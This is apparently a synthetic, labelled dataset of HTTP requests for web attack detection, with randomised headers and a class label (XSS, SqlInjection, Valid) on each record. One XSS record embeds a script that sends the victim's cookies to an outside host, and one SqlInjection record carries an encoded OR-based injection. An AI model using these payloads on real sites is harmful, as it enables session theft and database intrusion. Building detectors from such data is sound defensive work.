X-Forwarded-For: 159.122.226.252
X-Serial-Number: 8380011
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31483
Start - Id: 46598
class: XSS
GET /mRN6Ad1ZFnT2e/PHB6z8mNXsIs.png?eeoai=+rk8 HTTP/1.0
Host: www.egdn8E.it
Connection: keep-alive
Accept: audio/basic, video/quicktime
Accept-Charset: windows-874, x-mac-ce;q=0.2, x-mac-japanese, iso-2022-jp
Accept-Encoding: <!-- -- --><script   >[document.location.replace('http://www.erte.com/cgi-bin/alng.cgi'+document.cookie);]</script ><!-- -- -->
Accept-Language: dcahEs-etlni, ctr-ufietr;q=0.4, qteinl-mp3Gidht, o2stn-gh1eBi;q=0.7
Cache-Control: no-transform
Client-ip: 85.69.51.81
Cookie: oyjeNilabsexds=78642;a0ueonh6g=dwOqen9ame5iao;nte25rSbnt9usa=ur
Cookie2: $Version="8"
Date: Thu, 24 Sep 09 01:12:15 UTC
ETag: "9zn7eT01akETkZC"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Wed, 07 Apr 10 24:18:11 GMT
If-Unmodified-Since: Fri, 04 Aug 06 18:15:32 UTC
If-Match: *
If-None-Match: *
If-Range: "FJKz8uFZ9rm1590cR"
Max-Forwards: 287
MIME-Version: 3.4
Pragma: ticEt='hnuwid9n'
Proxy-Authorization: Basic b3BvdTlsOm50Y28=
Authorization: Basic ZXJhNWNjbmY6dDU5cA==
Range: 120-997408,-53
Referer: /sEGlm2.nsf
TE: chunked;q=0.1
Trailer: Accept-Language
User-Agent: 0ncizh0/3.3.5.8.4
UA-CPU: Sparc
UA-Disp: 5748,579,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: gzip
Upgrade: erett/0.5, bhtitr/9.0, L0zT/4.9
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 182.65.143.99
X-Serial-Number: 015353495234
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46598
Start - Id: 42465
class: SqlInjection
GET /deblh7n/sq7NR/oz16z0xVoQnW/9aa9ipt/mZege/jJ6Ewd0.QvL.php?gn6ydttexft=q0IQ.itGu&h4heeTitarfSnD=%27+++%2F**%2F++++OR+++%2F**%2F+++%27sjchl8l%27+++++%3E+%27S&s5ayrse=59958&nas5eeygtot=ubncti+6&uaEdbn=5020416&tJtTn=-z&xp_HxH9a=khttpO&rmoac4yYiSE=n%7E4&rsna3oabhfnA04e=gBo_uvK9&yardec7g=d%26xtBc%7E+geErakti HTTP/1.1
Host: www.2aw0.com:6
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-8-i;q=0.4, euc-tw, iso-8859-6;q=0.1
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: max-stale=1
Client-ip: 88.195.225.227
Cookie: CoOECPsbi_DR=hen4 ;Anrc5iherdd=8;isLhytw3zoss=u8po;hEHPtntinynt=7918;AqCXhtacces-H544=431803
Cookie2: $Version="3"
Date: Fri, 18 May 07 20:00:45 CET
ETag: W/"x0CGuG3XSClWRc@T"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Fri, 05 Nov 04 09:15:30 GMT
If-Unmodified-Since: Fri, 02 Mar 07 14:31:44 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 30
MIME-Version: 9.0
Pragma: otoepa6='oEDisdE'
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: 7an4e 9cqe4e=chEots
Range: 464608-7,46934-
Referer: http://fhrss.de/6ior/sd1smbia/ntnoh/Phw5/jsti.png
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.4 (compatible; erbcj; SunOS sun4u; Uivoril; moeghd; c65Psihyn)
UA-CPU: 68000
UA-Disp: 910,4080,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: identity
Upgrade: nhii/6.1, lbree/5.0
Warning: 638 134.55.212.85 "ertheexn7ru" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42465
Start - Id: 4287
class: Valid
PUT /sZsevqdhcrlm/qW55/bJI8AU6Ofmeta8P@v2/raPN1scos/83ihqfWyVwHtHyFTVE/c8m1leasrcvcc1iTj/ipOZ77kR0k8/ics48ee/iqzYI1rmGmeN/e3ssfivhkbyfe/lE5uJ1p9.cgi? HTTP/1.1
Content-Length: 164
Content-Language: aw1ll,gbhnS
Content-Encoding: gzip
Content-Location: /6lojeca4/otem/eMniW/sdOepvs/hjtTeQ4h.pdf
Content-MD5: Y3N2ZUJ1RGVyRWVsNWlzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Jul 07 17:32:07 CET
Last-Modified: Sat, 07 Apr 07 14:57:39 CET
Host: 81.170.51.119
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-15;q=0.5, iso-8859-3, isiri-3342;q=0.9
Accept-Encoding: *
Accept-Language: mhEm2ocd-gcGe;q=0.0, mtT0s-crbDfaA, iewd1-mtpieS;q=0.0, c5lb-ppp;q=0.1
Cache-Control: only-if-cached
Client-ip: 214.181.125.246
Cookie: tounst9r6=eesi;necrzie=O)I;sdoeweej55b=1101920
Cookie2: $Version="95"
Date: Tue, 28 Feb 06 17:35:37 CET
ETag: W/"MRkKHnsaDy1Jpque"
Expect: 100-continue
From: d4tmdhbi@dApmaveH.gov
If-Modified-Since: Sat, 11 Feb 06 10:10:38 GMT
If-Unmodified-Since: Sun, 24 Jul 05 18:11:25 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Oct 07 21:11:38 UTC
Max-Forwards: 4763
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest response="Ccd5eeD66f5934ac43CC47AD7e7eE496"
Authorization: Digest username="Odtta4eo"
Range: 557-
Referer: /evcbs/evaa.php3
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 6.2; ca-sl; rv:5.7.5) Gecko/90392806
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 536x588
Via: 8.4 12.125.67.151:2, FTP/9.2 www.ESrs4.gif:751
Transfer-Encoding: gzip
Upgrade: Unh/4.4
Warning: 787 www.taikmdp.html:2894 "o4xcDruec" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 41906
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

te3rSifunsdI=t6lEonRDiS9&tsos1dtXw=rdj2YMX&sEaruwm=390410970&ioayi5Uo=3&irhugRy=daa&zm8nkUNhUmos=wEICife&rmsdlAbhaRh4=mcyOrnei&lnlen9lvYnaDst=563296&C2Rs0meta=23041

End - Id: 4287
Start - Id: 13815
class: Valid
GET /n_htqx/IEmerh8dte/anP2FZFo/irqiepcRssdTd9kr9de/nnoc7ehkm5weriBiu/X9wnhexLthlxeTofrs/rh0yaielanctcciIebte/g8rl/xohN/h4Q8ZileumMCI.dmzD/tZfyk.50qXI@.css?pipNirv8ro=72408&5nhtpass@=xenbod%27loEb%25&6Oarmo=81363213&for1sl=72&sfhdyne=d1EZIbKh&aalR=eactrgolEdwgunv37u HTTP/1.1
Host: 166.149.69.128
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: us-ascii;q=0.3, isiri-3342;q=0.2, x-mac-cyrillic
Accept-Encoding: gzip;q=0.4, gzip, identity, compress, gzip;q=0.8
Accept-Language: 0t-N
Cache-Control: no-cache
Client-ip: 237.204.86.87
Cookie: tu2itxlt=97986
Cookie2: $Version="3"
Date: Sun, 16 Jul 06 09:23:16 CET
ETag: "GSILO7Th1taqOUKnQita"
Expect: ttoe=plrj5ar;nsee5cl=pmo7
From: dyZe1pi@teufdqetl.cz
If-Modified-Since: Mon, 21 Mar 05 12:49:50 CET
If-Unmodified-Since: Tue, 28 Sep 04 10:23:01 UTC
If-Match: *
If-None-Match: "OmGoWLUe-s3ZVHPBw8"
If-Range: Wed, 12 Jul 06 11:21:54 GMT
Max-Forwards: 86
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ycrd"
Authorization: Basic c2NyZGluOm1hdHNra29k
Range: -658220,9-,-209
Referer: /srie/eideaz/hveroxtq.jsp
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: tieo/2.4
UA-CPU: MIPS
UA-Disp: 1686,350,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: gzip
Upgrade: liu/3.9, ah1/5.7
Warning: 666 84.76.236.184 "t0uoITqzpy2Sloui" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 4673699275390197026
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13815
Start - Id: 14037
class: Valid
GET /lhttTdd/rleHMPhhlf8rdaQ@m4/n4H.v911Hx86B9cF/lswuetcPnwinnt0Wnetcatt/uiq@osMKw_/sgeanaedoe/O9gsTSservices@-NvVph/oiElnani2/ew-tZCH0YG0SN-WwZmGa.jpg?ksXi=4591374&urGwiount7=5ew&ild=oodi%2Foentwspalhttpsmastdin&lfosoisn97snsnf=7462983&Bunion29=irio HTTP/1.1
Host: www.Re98eunlI.org
Connection: keep-alive
Accept: video/quicktime;q=0.2, text/xml, text/plain
Accept-Charset: utf-8;q=0.7, gb2312;q=0.7
Accept-Encoding: deflate
Accept-Language: tfe-o;q=0.6, dvipnsCu-nee9yo
Cache-Control: max-stale
Client-ip: 185.231.121.162
Cookie: 7nyskjl3N=7;t8whrtythaqri=rsThk
Cookie2: $Version="5"
Date: Fri, 20 Jan 06 05:26:55 UTC
ETag: W/"mZ7T9k.3qtOxWWdp2KS"
Expect: awtWbm=tdPh;Ao4ive
From: rfmoqaTu@qirsnsp5oo.be
If-Modified-Since: Tue, 24 Jul 07 08:03:51 GMT
If-Unmodified-Since: Mon, 29 Nov 04 20:10:38 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Jun 05 21:34:12 GMT
Max-Forwards: 7
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nsetvaon"
Authorization: Digest opaque="eehe7O3"
Range: 92-
Referer: http://agGuuoaw.ch/niauxb/1hsR/eounthe/Er402/uetiet.jsp
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 3.9; nc-s7; rv:7.5.7) Gecko/66381696
UA-CPU: x86
UA-Disp: 7781,2537,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8443x481
Via: FTP/3.8 www.aalah6i4.html, HTTP/4.6 www.gd0o.gif
Transfer-Encoding: gzip
Upgrade: iQr/6.2
Warning: 285 12.210.81.67 "VnnPEeqt6bdltiru" 
X-Forwarded-For: 70.126.200.109
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14037
Start - Id: 26539
class: Valid
GET /vRTEO/Mer/uKlikeKE/eho3upkae98Rdeehait/laniorhHx27e1awgse.mspx?nse5fdThnh=52&cvat3hqetnsd=0dhb%2Bwmo%3Bo%7Ci%5Bmt%40&ioeR3iomtwr0o=e%28a&lnzretbct=d%40If&ZCHG7update7Yj=kcoci%26htaccess+to5r2ibgroup+by&esiumse=3 HTTP/1.1
Host: www.annnlp.cz:350
Connection: close
Accept: image/png;q=0.5, video/*;q=0.6
Accept-Charset: hz-gb-2312, iso-8859-5;q=0.1, windows-1250, x-mac-chinesetrad, x-mac-arabic
Accept-Encoding: *;q=0.1
Accept-Language: lf3qteI-l, 2nUjoif-oa;q=0.7
Cache-Control: only-if-cached
Client-ip: 9.2.33.29
Cookie: 7chsstibr=5756044;emtonteatd=yp87lkDastotnk5n;oanph-MG5=83
Cookie2: $Version="58"
Date: Tue, 20 Apr 04 04:11:06 GMT
ETag: W/"etaGvR5q5@aEoYpWCD"
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Tue, 27 Jan 09 01:16:31 CET
If-Unmodified-Since: Sun, 02 Jul 06 19:38:54 CET
If-Match: *
If-None-Match: "2ElqXbWNZ5lFX5rN-e0F"
If-Range: Thu, 15 Apr 04 18:33:27 GMT
Max-Forwards: 31
MIME-Version: 5.3
Pragma: eIep=sglbdr
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -576
Referer: /hiTltbT/uSnt7hr/nekel6t/mnaL9/prctwnY.ace
TE: gzip;q=0.9,deflate
Trailer: Accept-Encoding
User-Agent: tFBSdFG http://www.mrnn.uk
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: jIaE/7.1 252.153.231.228
Transfer-Encoding: deflate
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 248 51.93.56.9 "9mucan7xiiw9go4ettes" "Sat, 18 Mar 06 14:43:39 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26539
Start - Id: 12387
class: Valid
GET /pBLon/UsS65z3J/rmssotrn/xx.Gi/hdimgNkR5/2lo0winnt_Jechot2mdU/cou6eloteebnhhlaihe/p-/m_T7k0.dsL/nAnrnuktNqot3rHeoqlm/ifcz.tiff?dfyej9laNoui9=zonukioon4copye&nwv6mtttdh=68598&treosqee1=85343061 HTTP/1.0
Host: www.eeoofil8cy.uk
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.3, compress, deflate
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 63.40.194.81
Cookie: osra2gainsb=3thsnteimn?;esreAargswblo=P;rr] whusrO dtexecT;43seouwnfarw=rN2T06DEd;1Micaxaobms=u4q0gE_mwzTg
Cookie2: $Version="00"
Date: Mon, 26 Nov 07 05:15:59 GMT
ETag: W/"xcdyGu8n9CfUFeFjthXj"
Expect: nRes=wieneyt;tnwsGi=ogaiskdo
From: e4eiiuh@Mdhi8o.com
If-Modified-Since: Mon, 01 Mar 04 08:19:11 CET
If-Unmodified-Since: Thu, 28 May 09 16:28:41 UTC
If-Match: "nrH_Ohe_7rpNDmO0U"
If-None-Match: "DoG5IlGMY0f4XLd1pU4k"
If-Range: Wed, 23 Sep 09 04:29:55 UTC
Max-Forwards: 0612
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="oiaj"
Authorization: NTLM T3I0bGduYXBzM2Rzc3RlcGk2ZWRqOWFKdGFoeHRwbm1pM1JtcW9Jc25yZXM=
Range: 378982-23
Referer: /etyhzsne/aaosw62d/ttoRo/sda3sri3/wi6nO76s.php4
TE: trailers,deflate
Trailer: Connection
User-Agent: hRdhhMaa/0.3.3.4
UA-CPU: 68000
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8258x863
Via: haeIg/4.1 www.wh3ap6Td.jpeg, 8.2 www.ymao.js
Transfer-Encoding: dogj
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 112 www.nlni5Osh.jpg "eEdDh" "Thu, 31 Jan 08 18:55:01 CET"
X-Forwarded-For: 106.171.134.114
X-Serial-Number: 41667021783349598958
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12387
Start - Id: 31011
class: Valid
GET /4r/dKTiVrjn/t5a/stdin4gDOando2/aZUj7PBm4@q4Zbzx/sK/ylnArten4ijo/vj.shtml?lviYeess4sAr=detRaeeud7&i8EraJocn7l6m0=86884645&For6TwCc0documentBhC=%5D&ho8esn2jodk5db=aeioncvhqEyvrnEe8c&Dttinordocsczn=eFPqQ.c&iStbruc3uem=30532594&nre=0m1f_2A9vxMv&nnnqTlhvecr=Ou6rEawe&HokMhtpassZRpvu2=7951329&ngksjs=nh72&4b8toPqiat7Ay=72137&Utns2w5ldoepoms=7Nm%40l0v&aO4outetaed=ehCsV7nI7Pv HTTP/1.0
Host: 90.157.138.136
Connection: tttib0id
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: benna-Aee, s-aks51, ayoNm-tettgoe;q=0.9
Cache-Control: max-age=309
Client-ip: 154.71.85.33
Cookie: NEsq=4471;3IE9PBwd=4
Cookie2: $Version="34"
Date: Thu, 01 Jul 04 12:17:38 CET
ETag: "X13lKM5GD4tH2TvaF"
Expect: 100-continue
From: x75tiate@nIeEn1.it
If-Modified-Since: Sat, 24 Apr 04 15:37:08 GMT
If-Unmodified-Since: Sun, 21 Dec 08 10:57:31 GMT
If-Match: *
If-None-Match: "v.MsfLR.UXaXWc@"
If-Range: *
Max-Forwards: 2
MIME-Version: 5.3
Pragma: r1l='hedI'
Proxy-Authorization: eeu7 ueeiov3a=orpt7utl
Authorization: NTLM aHR1cG9oZWRubm1FcmFlbHFsQXNvczZuaDRySWV5aGFodk80eGU5d2FucGUzZA==
Range: 740-8502,247843-588
Referer: /dtsnl/lvtspttx/fiuid.jsp
TE: chunked
Trailer: Cache-Control
User-Agent: 6AlUe2r http://www.euAd.cz
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: FTP/8.0 65.152.239.50
Transfer-Encoding: deflate
Upgrade: rsiehy/1.3, 29tde/2.6, oilqm/3.1
Warning: 748 223.214.209.242 "ttmlx0H5" "Fri, 19 Feb 10 21:58:45 CET"
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 65625
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31011
Start - Id: 1294
class: Valid
GET /eirzeManrlI1tPes/3h/tzPBj-yOuswDpA0l/eoalte4ifQtdic.js?oaheal7c=kg%25u&4selectAK=ssob%2B%5Dnxmlecxt%5Dai&j5=Rptun&neeznt=n.fu HTTP/1.0
Host: 44.148.5.36
Connection: p1uwapn
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.2, compress, gzip;q=0.4, compress;q=0.3
Accept-Language: 9o7Ar-n0arten
Cache-Control: max-stale
Client-ip: 112.229.186.37
Cookie: VHp5jiifuouo9ie=54216;egts0smTfesmne=tpntiLl;feeeepea6itya=chi
Cookie2: $Version="8"
Date: Sat, 20 May 06 19:02:04 UTC
ETag: "SE.lWRy6TNN-2uBv01"
Expect: hek4snqi
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Wed, 11 Apr 07 16:08:48 GMT
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: "GcwMxxuTxZTcOfE"
If-None-Match: *
If-Range: "jOaQWMUi1MPcr05Rsc"
Max-Forwards: 59
MIME-Version: 7.7
Pragma: i='a2'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM YWl0ZWl0eGJoZnpSbmhlYXJwcm10b2ltbGVubjlLcnJlcXhvb2xBYXVlMmlZYWU1
Range: 282-,2-77614,032140-
Referer: /3istpuoA/reeznr/exrs/taid.php
TE: trailers,trailers
Trailer: User-Agent
User-Agent: esaraeea/9.0.1.7
UA-CPU: PowerPC
UA-Disp: 893,913,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7486x696
Via: 8.9 www.Uioi.html:4292, 8.3 7.233.142.22:9878, 3.2 91.153.24.124
Transfer-Encoding: identity
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1294
Start - Id: 7322
class: Valid
PUT /lv/ysau/yBtsrtn/dsayas2ephewLugtrH.swf? HTTP/1.0
Content-Length: 139
Content-Language: rMo,muCusnoe,li
Content-Encoding: compress
Content-Location: /aP6e5d/4fnoid/bH5Hwg/nlbnoht.conf
Content-MD5: ZXR3bXRsYmlldDAwdDNmaw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Aug 05 02:33:14 GMT
Last-Modified: Fri, 25 Sep 09 19:04:55 CET
Host: www.itWwouwha.biz:77268
Connection: keep-alive
Accept: video/*, application/*;q=0.2
Accept-Charset: iso-8859-6;q=0.2
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 116.174.177.144
Cookie: 3mshcyqrreAnfm=56151;rnd=oEoghtnq9i;oCa=7r4tebhbuNnytsl;lusafve1khetx=tmpeEe;lznei=sRI0q
Cookie2: $Version="37"
Date: Sat, 09 Feb 08 08:43:02 UTC
ETag: W/"1SnCPDw0whDv-OC"
Expect: oSi1hwrn=63dctcaM;sajo
From: adnn@sheottIf.gov
If-Modified-Since: Wed, 09 Mar 05 17:32:03 GMT
If-Unmodified-Since: Wed, 06 Jan 10 02:55:40 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Sep 04 09:19:36 GMT
Max-Forwards: 4
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Njllcmh0bmxBbnF0T2RhZWh3anVydGRzM25lZG9zZzZ1U3R0UGVqTm8=
Authorization: NTLM a2VhZXpld3J1T2ltOGRyeTNTRXRhb25xSXJjYmVzbWFlaWxldGFobWloZg==
Range: 8-57,12-302,31375-71
Referer: /STie2u/stbsI0/uIdsyals.zip
TE: gzip,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: iniiwo/6.7.1
UA-CPU: 68000
UA-Disp: 362,772,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1302x7380
Via: 4.8 145.44.244.100, FTP/6.5 www.oioaarie.gif, 6.1 254.52.18.209
Transfer-Encoding: gzip
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 354 www.uehg.shtml "wievwsmnOqro" "Thu, 02 Jul 09 09:12:16 UTC"
X-Forwarded-For: 180.148.168.191
X-Serial-Number: 0347000130099147
----: ---------------
~~~~~: ~~~~~~~~~~~~

toH1uuije=dar=&f2erdhtztotfc=s58quslatagepage&bhnahAantue=so0iucilemseditob&tuaixewe3=yK84wiU2P&JPu7=nqRnhseasulnHlscp&wltiNthseehhtDn=rd

End - Id: 7322
Start - Id: 31897
class: Valid
GET /dnn5elslmhes/o1Seta1aa7e6eXslesE0/rs/aXxHq.o.5m/sfoh7h5spenm/i1.oRK32jh/eamho6tmncalfhlfse.swf?eWinyS=5713162&naruszcmkt6at=%25So&q0tmpPCn=cjv%29mnoea+R&ocw3srljaapn=44&fasosmfcihehee=execa&mynnhetoqqaeva=%3F+%3B&lRINrxtermIX=t&twga5e=58&c1slewlildok=4172483&grbirerI7Ad=tk+hlaeevartrwoee HTTP/1.0
Host: www.eaLefiie.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: rihev-fn, e-sh, n-aSsi, o-ye;q=0.5, j-m;q=0.0
Cache-Control: no-transform
Client-ip: 1.208.23.253
Cookie: PnsnawNanNce=asanrnaaylidTs3;detEte=tanbtoe4m3drhNel
Cookie2: $Version="03"
Date: Thu, 12 Jan 06 21:19:55 GMT
ETag: W/"ZZYY7JoP4x.Y.wset"
Expect: 100-continue
From: haeoa@filcnbidra.net
If-Modified-Since: Thu, 22 Mar 07 05:55:51 CET
If-Unmodified-Since: Tue, 16 Aug 05 02:27:29 UTC
If-Match: *
If-None-Match: "GxFf.oKRyLYCSdKM"
If-Range: Wed, 24 Feb 10 23:22:51 GMT
Max-Forwards: 19
MIME-Version: 2.4
Pragma: 7a9='AtnStnta'
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: Basic ZWVzb2FyOnJsbDBv
Range: 581-,06-0,27-
Referer: /l95rr.css
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 0.7; oe-et; rv:6.4.0) Gecko/57080775
UA-CPU: StrongARM
UA-Disp: 280,3333,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 154x250
Via: HTTP/3.8 www.1steTue.jpeg, 1.0 108.236.29.173
Transfer-Encoding: deflate
Upgrade: znl/9.4, enhOao/1.7, esna/5.0
Warning: 978 44.130.75.56 "tySnc" 
X-Forwarded-For: 66.190.156.36
X-Serial-Number: 812398
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31897
Start - Id: 12479
class: Valid
GET /gaqheit/E9zetxitiu.tiff?TiiMsSr=3289&EeRpk0p=b+&n7lavOuvtee=igt&ehsAe=fgisr&auit=7892619&tih7tsstiute=1eD&2eh0=%2BDe4&zheetxh4tnxslfk=076&i3rm=e6PPRXv HTTP/1.0
Host: 20.204.40.33
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip;q=0.7, compress, gzip;q=0.5
Accept-Language: yrehs6ah-e, a4a5en0E-tzdoelIs, 2t-ns, eoni-emhenPd3;q=0.8
Cache-Control: max-stale=44
Client-ip: 71.219.22.11
Cookie: A4czdAtgw=8;dfnomaE82yr=gcPa;c1beobaltD08euw=0JGGZNW;pDjtsdrQ4byyr2=mmioc$tkcNttMin
Cookie2: $Version="4"
Date: Thu, 31 Jan 08 08:19:22 UTC
ETag: W/"ysFV2@WM0CqMD-G"
Expect: eoaA3tio=as6onmf;mi3td5g1=eeT7
From: a0lewqe@txeohoo.be
If-Modified-Since: Sat, 10 Apr 10 03:48:49 CET
If-Unmodified-Since: Tue, 09 Mar 04 02:26:52 GMT
If-Match: "JTo7HUTCtM.zmPEM"
If-None-Match: "UZII4pT.z7DojM7xT5"
If-Range: "wTU6OBOLnnOjHa04h0P8"
Max-Forwards: 91
MIME-Version: 5.9
Pragma: tmg='t'
Proxy-Authorization: Digest qop=ttetoa
Authorization: Basic QWVzZWF3c046a2VnenVzYQ==
Range: -6,6265-
Referer: /ioS1uso.html
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/1.7 (X11; U; Solaris 8.7; aa-ss; rv:1.3.6) Gecko/74471890
UA-CPU: 68000
UA-Disp: 711,789,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 163x254
Via: FTP/8.8 www.wbatcti.jpg:76, 4.5 254.107.73.65
Transfer-Encoding: compress
Upgrade: leln4g/2.4
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12479
Start - Id: 16325
class: Valid
GET /eEerdelte/ycNcf5tr/aQscodmosiertlebiye/9m.swf?rofaayNlmeote=rZtnq1p&lsgDXj8w1havingj=8820&c9teOo=aIz&emtPmc9gvzwr=besnre1t4&LAartFsx=ikktgXpRLvI&szRasmpusCeeh=ngcmeglear&rrezr=99374&4uYmnbrr=mMpqV&tB2nf=251 HTTP/1.1
Host: www.agsaiclees.org:7781
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate, deflate, gzip
Accept-Language: sn4-hzhsf4, tsadmy-Eu
Cache-Control: max-stale=3759
Client-ip: 76.128.152.96
Cookie: eebdgiR2EaoEtua=33607675;t6bt=honruiuwoemexecnm;nrc=936813
Cookie2: $Version="463"
Date: Wed, 11 Jun 08 15:55:12 UTC
ETag: "OIq2z55.cn@ja3WSe625"
Expect: mii8=7pi0yr;blo1=Utnsh
From: fewlhd@mrbErs.biz
If-Modified-Since: Mon, 17 Jan 05 14:04:33 GMT
If-Unmodified-Since: Sat, 04 Dec 04 16:57:05 UTC
If-Match: *
If-None-Match: "IK2caHMmnCDa..BChUk"
If-Range: *
Max-Forwards: 1892
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="82A7c3FC33BF6ce472e42Ce6b7Ca8D7B"
Authorization: Digest realm
Range: -652120,9-,091-
Referer: http://ttRFtse.uk/scRyuaig/dEvdtos/3aia0Nd/dsvor6Sr/zecd5Eoo.swf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.5 (compatible; srtaei; Win 9x; irIeispohE; onelelt; ll39)
UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 295x026
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: gzip
Upgrade: weawp/7.1
Warning: 533 www.sednnp.jpg "tceskevmhah" "Sat, 03 Dec 05 07:14:22 UTC"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 5823721853014
----: --------------------------------------------
